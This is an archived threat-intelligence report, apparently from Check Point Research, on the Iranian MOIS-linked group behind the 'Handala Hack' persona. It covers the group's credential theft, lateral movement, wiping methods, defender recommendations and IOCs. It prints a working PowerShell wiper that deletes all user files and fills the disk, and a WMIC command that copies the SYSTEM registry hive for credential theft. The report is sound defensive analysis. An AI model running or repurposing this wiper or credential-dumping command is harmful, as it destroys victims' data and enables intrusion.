{
	"id": "950e699a-0afb-47f6-8247-7a6f1cd865dc",
	"created_at": "2026-04-29T08:21:21.414302Z",
	"updated_at": "2026-04-29T10:42:34.37288Z",
	"deleted_at": null,
	"sha1_hash": "979f227e0a49d53b1ede7ef459392e5a992b33aa",
	"title": "“Handala Hack” – Unveiling Group’s Modus Operandi",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 86493,
	"plain_text": "“Handala Hack” – Unveiling Group’s Modus Operandi\r\nBy matthewsu\r\nPublished: 2026-03-12 · Archived: 2026-04-29 07:11:44 UTC\r\nKey Findings\r\nHandala Hack is an online persona operated by Void Manticore (aka Red Sandstorm, Banished Kitten), an actor affiliated with the Iranian Ministry of Intelligence and Security (MOIS).\r\nAdditional personas associated with this actor include Karma and Homeland Justice, which have been used in targeted operations against Israel and Albania.\r\nHandala continues to rely on longstanding TTPs, primarily conducting quick, hands-on activity within victim networks and employing multiple wiping methods simultaneously.\r\nIn parallel, some newly observed TTPs include the deployment of NetBird to tunnel traffic into the network, as well as the use of an AI-assisted PowerShell script for wiping activity.\r\nIntroduction\r\nHandala Hack, also tracked by Check Point Research as Void Manticore, is an Iranian threat actor known for multiple destructive wiping attacks combined with “hack and leak” operations. The threat actor operates several online personas. The most prominent among them are Homeland Justice, maintained from mid-2022 specifically for multiple attacks against government, telecom, and other sectors in Albania, and Handala Hack, which has been responsible for multiple intrusions in Israel and has recently expanded its targeting to US-based enterprises such as medical technology giant Stryker.\r\nThe techniques, tactics, and procedures (TTPs) associated with Void Manticore intrusions remained largely consistent throughout 2024 to 2026, as the group continued to rely primarily on manual, hands-on operations, off-the-shelf wipers, and publicly available deletion and encryption tools. Accordingly, our previous research on the actor, published in early 2025, remains highly relevant to understanding their activity. 
Void Manticore has historically used both custom-built and publicly available tools, while also relying on underground criminal services to obtain initial access and malware.\r\nAs the group’s operations expanded in scope, with recent attacks targeting U.S. organizations, we decided to share our observations on this cluster’s activity, with a particular focus on recent TTPs and newly identified indicators.\r\nBecause the group operates primarily through manual, hands-on activity, its indicators tend to be short-lived and consist largely of commercial VPN services, open-source software, and publicly available offensive security tools.\r\nBackground\r\n“Handala Hack” is an online persona operated by Void Manticore (Red Sandstorm, Banished Kitten), a MOIS-affiliated threat actor, and appears to draw its name and imagery from the Palestinian cartoon character Handala.\r\nThe persona has been used extensively since late 2023 and represents one of the group’s three primary operational fronts. The other two are Karma, which was likely completely replaced by Handala, and Homeland Justice, a persona the group continues to use in operations targeting Albania.\r\nhttps://research.checkpoint.com/2026/handala-hack-unveiling-groups-modus-operandi/\r\nPage 1 of 11\n\nFigure 1 – Logos of Void Manticore personas (from left to right): Homeland Justice, Handala and Karma.\r\nBased on our observations, intrusions linked to all three personas exhibit highly similar TTPs, as well as code overlaps in the wipers they deploy. Another distinctive characteristic shared by Karma and “Homeland Justice” is the collaboration with Scarred Manticore, a separate Iranian threat actor. 
In the case of Handala and Karma, we have also observed incidents in which the victim-facing group (i.e., messaging within the wipers, notes left in a compromised environment) was presented as Karma, while the stolen data was ultimately leaked through Handala.\r\nFigure 2 – Operational interconnections of Void Manticore\r\nOne possible explanation is that Karma and Handala initially represented two separate teams or operational efforts within the same organization, but later converged under a single brand. This would be consistent with Karma’s complete disappearance and Handala’s emergence as the dominant public-facing persona.\r\nAccording to public reporting, Void Manticore overlaps with activity linked to the MOIS Internal Security Deputy, particularly its Counter-Terrorism (CT) Division, operating under the supervision of Seyed Yahya Hosseini Panjaki. Panjaki was reportedly killed in the opening phase of Israel’s strikes on Iran in early March 2026.\r\nInitial Access\r\nSupply Chain Attacks\r\nHandala has consistently targeted IT and service providers in an effort to obtain credentials, relying largely on compromised VPN accounts for initial access. Over the last months, we identified hundreds of logon and brute-force attempts against organizational VPN infrastructure that were linked to Handala-associated infrastructure. This activity typically originates from commercial VPN nodes and is frequently tied to default hostnames in the format DESKTOP-XXXXXX or WIN-XXXXXX.\r\nAfter the internet shutdown in Iran in January, we observed similar activity originating from Starlink IP ranges, and it has continued since. 
This has occurred in parallel with a decline in the actor’s operational security, as the group has also begun connecting directly to victims from Iranian IP addresses.\r\nPreviously, the adversary generally maintained stronger operational discipline, typically egressing through the commercial VPN segment 169.150.227.X while operating against targets in Israel. In some cases, however, the VPN connection failed, exposing communications from Iranian IP addresses or from a virtual private server. Since the start of the war, the actor has struggled to maintain this level of operational security. At times, it successfully egressed through an Israeli node, 146.185.219[.]235, assessed to be linked to a VPN service, although this differed from the segment previously used.\r\nActivity Before Impact\r\nIn a recent intrusion attributed to Handala, initial access is believed to have been established well before the destructive phase, with network access dating back several months. This earlier activity likely provided the group with persistent access and the Domain Administrator credentials required to carry out the attack. In the hours leading up to the destructive activity, Handala appeared to validate its access and test authentication using the compromised credentials.\r\nIt is unclear whether this activity is directly associated with Handala, as it slightly differs from their typical TTPs. The actor disabled Windows Defender protections and executed multiple reconnaissance and credential-theft operations. Shortly afterwards, the attacker attempted to retrieve an additional payload from a dedicated command-and-control server (107.189.19[.]52).\r\nThe adversary then proceeded with credential extraction using multiple techniques. 
These included dumping the LSASS process using comsvcs.dll via rundll32.exe, as well as exporting sensitive registry hives such as HKLM. In parallel, the attacker executed ADRecon (named dra.ps1), a PowerShell-based reconnaissance framework used to enumerate Active Directory environments. At this point, the actor likely obtained the Domain Admin credentials later used in Handala’s wiping attack.\r\nwmic.exe /node:[REDACTED_HOSTNAME] /user:[REDACTED] /password:[REDACTED] process call create \"cmd.exe /c copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\windows\\system32\\config\\system c:\\users\\public\"\r\nLateral Movement\r\nHandala is known to operate primarily in a manual, hands-on manner, with lateral movement conducted largely through extensive use of RDP to move between systems within a compromised environment. To reach hosts that were not directly accessible from outside the network, the group was observed deploying NetBird, a platform designed to create secure, private zero-trust mesh networks.\r\nThe deployment of NetBird was performed manually. The attackers first connected to compromised hosts via RDP and then used the local web browser to download the software directly from the official NetBird website.\r\nBy installing NetBird on multiple machines within the environment, the attackers were able to establish internal connectivity between systems and operate more efficiently. 
This approach enabled them to accelerate destructive activity while maintaining control of the operation from multiple footholds inside the network. During the incident, we observed at least five distinct attacker-controlled machines operating simultaneously within the environment.\r\nWiping Operations\r\nDuring the destructive phase of the attack, we observed the group deploying four distinct wiping techniques in parallel, likely to maximize impact and inflict the greatest possible damage. To further increase the effect, the threat actor used Group Policy to distribute the different wipers across the network.\r\nHandala Wiper\r\nThe first stage involved the deployment of a custom wiper, referred to as Handala Wiper (in some instances named handala.exe).\r\nThe wiper was distributed across the network as a scheduled task using Group Policy logon scripts, which executed a batch file named handala.bat. This script simply triggered the execution of two wiper components – the executable and the PowerShell script. Notably, the executable itself was launched remotely from the Domain Controller (DC) and was not written to disk on the affected machines. The malware overwrites file contents across the system and additionally leverages MBR-based wiping techniques to corrupt or destroy files on the system, contributing to significant data loss.\r\nFigure 3 – Wiper execution of Handala Wiper\r\nHandala PowerShell Wiper\r\nAs a final stage of the destructive operation, the attackers deployed an additional custom PowerShell-based wiper. Similar to the previous component, this script was also distributed through Group Policy logon scripts, allowing it to propagate across multiple systems within the network.\r\nThe PowerShell wiper performs a straightforward but effective operation: it enumerates all files within users’ directories and deletes them, further compounding the damage caused by the initial wiping activity. 
Based on the code structure and the detailed comments, it is likely that this PowerShell script was developed with AI assistance.\r\n$usersFolder = C:\\Users\r\n\r\n# Ensure the folder exists\r\nif (Test-Path $usersFolder) {\r\n    # Get all items in C:\\Users, but not the Users folder itself\r\n    $items = Get-ChildItem -Path $usersFolder -Recurse\r\n\r\n    # Remove each item (files and subfolders) inside C:\\Users\r\n    foreach ($item in $items) {\r\n        try {\r\n            Remove-Item -Path $item.FullName -Recurse -Force -ErrorAction Stop\r\n        } catch {\r\n            Write-Host Could not delete: $($item.FullName)\r\n        }\r\n    }\r\n}\r\n\r\n$sourceFile = \\\\[REDACTED]\\SYSVOL\\[REDACTED]\\scripts\\Administtration\\install\\handala.rar\r\n$destinationFolder = C:\\users\r\n\r\nif (!(Test-Path $destinationFolder)) {\r\n    New-Item -ItemType Directory -Path $destinationFolder | Out-Null\r\n}\r\n\r\n$driveLetter = (Split-Path $destinationFolder -Qualifier).TrimEnd(':','\\')\r\n$i = 0\r\n\r\nwhile ((Get-PSDrive $driveLetter).Free -gt (Get-Item $sourceFile).Length) {\r\n    Copy-Item $sourceFile $destinationFolder\\Handala_$i.gif\r\n    $i++\r\n}\r\nUse of Disk Encryption for Destruction\r\nIn addition to the custom wiping tools, we observed the attackers attempting to leverage VeraCrypt, a legitimate and widely used disk encryption utility. In this case, the attacker connected to the compromised host via RDP and used the system’s default web browser to download the software directly from the official website. By encrypting the system drives using a legitimate tool, the attackers added an additional layer to the destructive process. 
This technique not only increases the operational impact but can also complicate recovery efforts, as encrypted disks may remain inaccessible even if other wiping components fail or are only partially successful.\r\nManual Deletion\r\nIn some cases, Handala Hack operators manually delete virtual machines directly from the virtualization platform or files from compromised machines. This straightforward process involves logging in via RDP, selecting all files, and deleting them. We observed this behavior in several incidents, and it is also documented in Handala Hack’s own videos and leaked materials.\r\nSummary\r\nIn this report, we detailed the background of the “Handala Hack” persona and its links to Void Manticore, an actor affiliated with Iran’s Ministry of Intelligence and Security (MOIS). Handala is not the only persona maintained by this actor, which operates several fronts in campaigns targeting the United States, Israel, and Albania.\r\nLike many destructive threat actors, Handala relies on relatively simple TTPs, largely aiming for quick, opportunistic wins through hands-on operations against its targets. These activities include gaining initial access through compromised credentials, moving laterally via RDP and basic tunneling tools, and deploying wipers alongside manual destructive actions. 
Their modus operandi has not shifted significantly, and strengthening defenses against these techniques remains an effective way to counter this threat.\r\nRecommendations for Defenders\r\nEnforce multi-factor authentication, especially for remote access and privileged accounts.\r\nMonitor for the use of compromised credentials and suspicious authentication activity, with an emphasis on the following:\r\n  Logins from countries not previously observed for your organization or specific users\r\n  Unusual access patterns, including:\r\n    First-time logins outside typical hours\r\n    Multiple failed logins followed by success\r\n    New device registrations\r\n    Unusual data transfer volumes during VPN sessions\r\n    Authentication from new ASN/hosting providers\r\nRestrict access from high-risk geographies and infrastructure:\r\n  Block inbound connections from Iran at the perimeter and on remote access services (VPN/SSO), unless there is a verified business need.\r\n  Block or tightly restrict Starlink IP ranges, given observed abuse in Iranian actor operations.\r\n  If full blocking is not feasible, implement conditional access controls, increased authentication requirements, and enhanced monitoring for these ranges.\r\nConsider temporarily tightening remote access policies. If operationally possible, temporarily restrict VPN connectivity to business-related countries only, with exceptions approved based on business need (e.g., whitelisted users/locations, dedicated jump hosts, or managed devices only).\r\nRestrict and harden RDP access across the environment; disable it where not operationally required. Actively search for RDP access from machines with the default Windows naming conventions (i.e., DESKTOP-XXXXXX or WIN-XXXXXXXX), especially outside of working hours.\r\nMonitor for the use of potentially unwanted software, including remote management and 
monitoring (RMM) tools, VPN applications such as NetBird, and tunneling utilities such as SSH for Windows.\r\nIOCs\r\nType | IOC\r\nHandala Wiper | 5986ab04dd6b3d259935249741d3eff2\r\nHandala PowerShell Wiper | 3cb9dea916432ffb8784ac36d1f2d3cd\r\nVeraCrypt Installer | 3236facc7a30df4ba4e57fddfba41ec5\r\nNetBird Installer | 3dfb151d082df7937b01e2bb6030fe4a\r\nNetBird | e035c858c1969cffc1a4978b86e90a30\r\nHandala VPS | 82.25.35[.]25\r\nHandala VPS | 31.57.35[.]223\r\nHandala VPS | 107.189.19[.]52\r\nVPN exit node used by Handala | 146.185.219[.]235\r\nStarlink IP range used by Handala | 188.92.255.X\r\nStarlink IP range used by Handala | 209.198.131.X\r\nCommercial VPN IP range used by Handala | 149.88.26.X\r\nCommercial VPN IP range used by Handala | 169.150.227.X\r\nHandala Machine Names\r\nWIN-P1B7V100IIS\r\nDESKTOP-FK1NPHF\r\nDESKTOP-R1FMLQP\r\nWIN-DS6S0HEU0CA\r\nDESKTOP-T3SOB36\r\nWIN-GPPA5GI4QQJ\r\nVULTR-GUEST\r\nDESKTOP-HU45M79\r\nDESKTOP-TNFP4JF\r\nDESKTOP-14O69KQ\r\nDESKTOP-9KG46L1\r\nDESKTOP-G2MH4KD\r\nMITRE ATT\u0026CK Breakdown\r\nATT\u0026CK Tactic | Technique | Observed Activity\r\nInitial Access | T1133 – External Remote Services | Use of compromised VPN access for entry into victim environments.\r\nInitial Access | T1078.002 – Valid Accounts: Domain Accounts | Use of stolen/supplied credentials, including Domain Admin credentials.\r\nInitial Access | T1199 – Trusted Relationship | Targeting of IT and service providers.\r\nCredential Access | T1110 – Brute Force | Repeated logon and brute-force attempts against VPN infrastructure.\r\nCredential Access | T1003.001 – OS Credential Dumping: LSASS Memory | LSASS dumping via rundll32 and comsvcs.dll.\r\nCredential Access | T1003.002 – OS Credential Dumping: Security Account Manager | Export of sensitive registry hives for credential extraction.\r\nDiscovery | T1087.002 – Account Discovery: Domain Account | ADRecon used to enumerate the Active Directory environment.\r\nLateral Movement | T1021.001 – Remote Services: Remote Desktop Protocol | Extensive hands-on lateral movement over RDP.\r\nCommand and Control | T1572 – Protocol Tunneling | NetBird used to tunnel traffic and reach internal hosts.\r\nExecution | T1105 – Ingress Tool Transfer | NetBird and VeraCrypt downloaded directly onto victim systems.\r\nExecution | T1047 – Windows Management Instrumentation | WMIC was used to run commands.\r\nExecution / Persistence | T1484.001 – Group Policy Modification | Wipers distributed via GPO.\r\nExecution / Persistence | T1037.003 – Network Logon Script | Logon scripts used to trigger destructive components.\r\nExecution | T1053.005 – Scheduled Task | Handala wiper launched as a scheduled task.\r\nExecution | T1059.001 – PowerShell | AI-assisted PowerShell wiper used for destructive activity.\r\nImpact | T1561.002 – Disk Structure Wipe | MBR-based wiping by the custom Handala wiper.\r\nImpact | T1485 – Data Destruction | File deletion, manual deletion, and destructive cleanup.\r\nImpact | T1486 – Data Encrypted for Impact | VeraCrypt used to encrypt disks as part of the attack.\r\nSource: https://research.checkpoint.com/2026/handala-hack-unveiling-groups-modus-operandi/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://research.checkpoint.com/2026/handala-hack-unveiling-groups-modus-operandi/"
	],
	"report_names": [
		"handala-hack-unveiling-groups-modus-operandi"
	],
	"threat_actors": [
		{
			"id": "9df96153-0450-4cbb-8a13-b737f16394ef",
			"created_at": "2023-11-03T02:00:07.788769Z",
			"updated_at": "2026-04-29T10:39:53.412049Z",
			"deleted_at": null,
			"main_name": "Scarred Manticore",
			"aliases": [],
			"source_name": "MISPGALAXY:Scarred Manticore",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "72fea432-77a6-437a-b02d-693e99d81ef9",
			"created_at": "2024-02-17T02:00:03.861221Z",
			"updated_at": "2026-04-29T10:39:53.68676Z",
			"deleted_at": null,
			"main_name": "BANISHED KITTEN",
			"aliases": [
				"Storm-0842",
				"Red Sandstorm"
			],
			"source_name": "MISPGALAXY:BANISHED KITTEN",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "13e58cc3-9acc-4564-8f84-b8cc0082ee4a",
			"created_at": "2024-05-23T02:00:03.982213Z",
			"updated_at": "2026-04-29T10:39:53.735425Z",
			"deleted_at": null,
			"main_name": "Void Manticore",
			"aliases": [],
			"source_name": "MISPGALAXY:Void Manticore",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "4134675e-5b72-4b50-8d70-1a8f18aafbb4",
			"created_at": "2024-10-04T02:00:04.766263Z",
			"updated_at": "2026-04-29T10:39:53.796517Z",
			"deleted_at": null,
			"main_name": "Handala",
			"aliases": [],
			"source_name": "MISPGALAXY:Handala",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "704af71f-d1ed-4252-88a9-d23a17e4b7b4",
			"created_at": "2026-04-29T02:00:04.621965Z",
			"updated_at": "2026-04-29T10:39:54.777343Z",
			"deleted_at": null,
			"main_name": "VOID MANTICORE",
			"aliases": [
				"VOID MANTICORE",
				"COBALT MYSTIQUE",
				"Handala Hack",
				"Homeland Justice",
				"Karma",
				"Karmabelow80",
				"BANISHED KITTEN",
				"Red Sandstorm"
			],
			"source_name": "MITRE:VOID MANTICORE",
			"tools": null,
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "7f25e108-e694-49b6-a494-c8458b33eb3f",
			"created_at": "2024-01-09T02:00:04.199217Z",
			"updated_at": "2026-04-29T10:39:53.616119Z",
			"deleted_at": null,
			"main_name": "HomeLand Justice",
			"aliases": [],
			"source_name": "MISPGALAXY:HomeLand Justice",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "20c759c2-cd02-45bb-85c6-41bde9e6a7cf",
			"created_at": "2024-01-18T02:02:34.189827Z",
			"updated_at": "2026-04-29T10:39:55.326323Z",
			"deleted_at": null,
			"main_name": "HomeLand Justice",
			"aliases": [
				"Banished Kitten",
				"Karma",
				"Red Sandstorm",
				"Storm-0842",
				"Void Manticore"
			],
			"source_name": "ETDA:HomeLand Justice",
			"tools": [
				"BABYWIPER",
				"BiBi Wiper",
				"BiBi-Linux Wiper",
				"BiBi-Windows Wiper",
				"Cl Wiper",
				"LowEraser",
				"No-Justice Wiper",
				"Plink",
				"PuTTY Link",
				"RevSocks",
				"W2K Res Kit"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "b3ebf51d-8f64-48a9-bbfb-674db872cccb",
			"created_at": "2025-08-07T02:03:24.769383Z",
			"updated_at": "2026-04-29T10:39:54.836181Z",
			"deleted_at": null,
			"main_name": "COBALT MYSTIQUE",
			"aliases": [
				"Banished Kitten ",
				"DEV-0842 ",
				"Druidfly ",
				"Handala Hack Team",
				"Homeland Justice",
				"Karmabelow80",
				"Red Sandstorm ",
				"Storm-0842 ",
				"Void Manticore "
			],
			"source_name": "Secureworks:COBALT MYSTIQUE",
			"tools": [
				"AllinOneNeo",
				"Bibi",
				"GramPy",
				"GramPyLoader"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "b6436f7b-6012-4969-aed1-d440e2e8b238",
			"created_at": "2022-10-25T16:07:23.91517Z",
			"updated_at": "2026-04-29T10:39:55.397649Z",
			"deleted_at": null,
			"main_name": "OilRig",
			"aliases": [
				"APT 34",
				"ATK 40",
				"Chrysene",
				"Cobalt Gypsy",
				"Crambus",
				"DEV-0861",
				"EUROPIUM",
				"Earth Simnavaz",
				"Evasive Serpens",
				"G0049",
				"Hazel Sandstorm",
				"Helix Kitten",
				"IRN2",
				"ITG13",
				"Scarred Manticore",
				"Storm-0861",
				"TA452",
				"Twisted Kitten",
				"UNC1860",
				"Yellow Maero"
			],
			"source_name": "ETDA:OilRig",
			"tools": [
				"AMATIAS",
				"Agent Drable",
				"Agent Injector",
				"AgentDrable",
				"Alma Communicator",
				"BONDUPDATER",
				"CACTUSPIPE",
				"Clayslide",
				"CypherRat",
				"DNSExfitrator",
				"DNSpionage",
				"DROPSHOT",
				"DistTrack",
				"DropperBackdoor",
				"Fox Panel",
				"GREYSTUFF",
				"GoogleDrive RAT",
				"HighShell",
				"HyperShell",
				"ISMAgent",
				"ISMDoor",
				"ISMInjector",
				"Jason",
				"Karkoff",
				"LIONTAIL",
				"LOLBAS",
				"LOLBins",
				"LONGWATCH",
				"LaZagne",
				"Living off the Land",
				"MailDropper",
				"Mimikatz",
				"MrPerfectInstaller",
				"OILYFACE",
				"OopsIE",
				"POWBAT",
				"POWRUNER",
				"Plink",
				"Poison Frog",
				"PowerExchange",
				"PsList",
				"PuTTY Link",
				"QUADAGENT",
				"RDAT",
				"RGDoor",
				"SEASHARPEE",
				"Saitama",
				"Saitama Backdoor",
				"Shamoon",
				"SideTwist",
				"SpyNote",
				"SpyNote RAT",
				"StoneDrill",
				"TONEDEAF",
				"TONEDEAF 2.0",
				"ThreeDollars",
				"TwoFace",
				"VALUEVAULT",
				"Webmask",
				"WinRAR",
				"ZEROCLEAR",
				"ZeroCleare",
				"certutil",
				"certutil.exe"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1777450881,
	"ts_updated_at": 1777459354,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/979f227e0a49d53b1ede7ef459392e5a992b33aa.pdf",
		"text": "https://archive.orkl.eu/979f227e0a49d53b1ede7ef459392e5a992b33aa.txt",
		"img": "https://archive.orkl.eu/979f227e0a49d53b1ede7ef459392e5a992b33aa.jpg"
	}
}